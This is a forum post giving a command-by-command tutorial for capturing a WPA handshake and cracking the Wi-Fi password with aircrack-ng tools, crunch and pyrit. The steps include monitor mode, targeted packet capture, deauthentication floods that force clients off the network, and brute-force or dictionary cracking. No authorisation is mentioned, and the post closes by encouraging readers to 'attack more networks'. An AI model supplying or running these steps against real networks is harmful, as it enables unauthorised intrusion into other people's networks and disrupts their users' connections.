View Full Version : Capture a handshake and crack it, with crunch and how to use it on Chromebook

2014-12-24, 09:31
Hi, i will help you with the standard operations of a wireless network attack on kali and wifi metropolis 3 on Wifislax.


1- First thing to do is get your wireless card in to mon0 for capture and injection. Its not vital to do this but it speeds up the attack and its used if your are already connected to a network.

Open up a terminal and type:

sudo airmon-ng start wlan0

then hit enter

2 - It will list your wireless card and show you the mon0 is active. It has now created a virtual wireless card. Now you need to scan for the network you want to attack and capture a handshake, a handshake is the data exchange between a client (network user) and the router (the network access point, also called the 'AP').

To start scanning type:

sudo airodump-ng mon0

then hit enter

3 - It will now scan and show you networks around you and their information like mac address, power, traffic, channel and clients. Once you have scanned and identified the target AP, hold down the buttons CTRL + C and this will cancel the running script, now you can tell the wireless card to only capture data packets from this network.

To capture the data type:

sudo airodump-ng --bssid xx:xx:xx:xx:xx -c (channel) -w (output file name) mon0

then hit enter

4 - It will now capture that data to the 'output file name', this will be stored in the HOME folder but do not move the file, rename or delete it. They will be 5 files created with the same name but different formats. They are all the same information but for different uses. The file we are interested in is the 'output-file-name.cap' file. Now would be a good time to try and capture that handshake in order to retrieve to the network password.

To capture the handshake open up a new terminal and type:

sudo aireplay-ng -0 10 -a (target mac address) mon0

then hit enter

With clients:

sudo aireplay-ng -0 10 -a (target mac address) -c (clients mac address) mon0

then hit enter

5 - It will now send 10 deauthentication requests to the AP and request all Clients to reconnect. With clients is more effective but takes longer to type. Airodump-ng will now try and capture the handshakes in process. Once it is captured (may take 20 minutes) you can now crack it, hold down CTRL + C to stop airodump capturing data.

To crack the handshake using crunch type:

crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -a 2 -b (target mac address) -w- (output file name).cap

then hit enter

With a dictionary type:

aircrack-ng -a 2 -b (target mac address) -w (dictionary name and path) (output file name).cap

then hit enter

6. Now sit back and have a nap, this could take a few hours :)

To crack using pyrit use the above steps 2, 3 and 4 to capture the handshake.

To crack with pyrit type:

crunch 8 12 ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r (output file name).cap -b (target mac address) -i - attack_passthrough

then hit enter

With dictionary:

pyrit -r (output file name).cap -b (target mac address) -i (dictionary file and path) (choose your attack mode)

then hit enter

Wifi Metropolis 3:

To capture a handshake and crack it with 'Wifi Metropolis 3' you just follow the on screen GUI.

Thank you for reading and i hope this helps you and encourages you to attack more networks and improve security on your home network.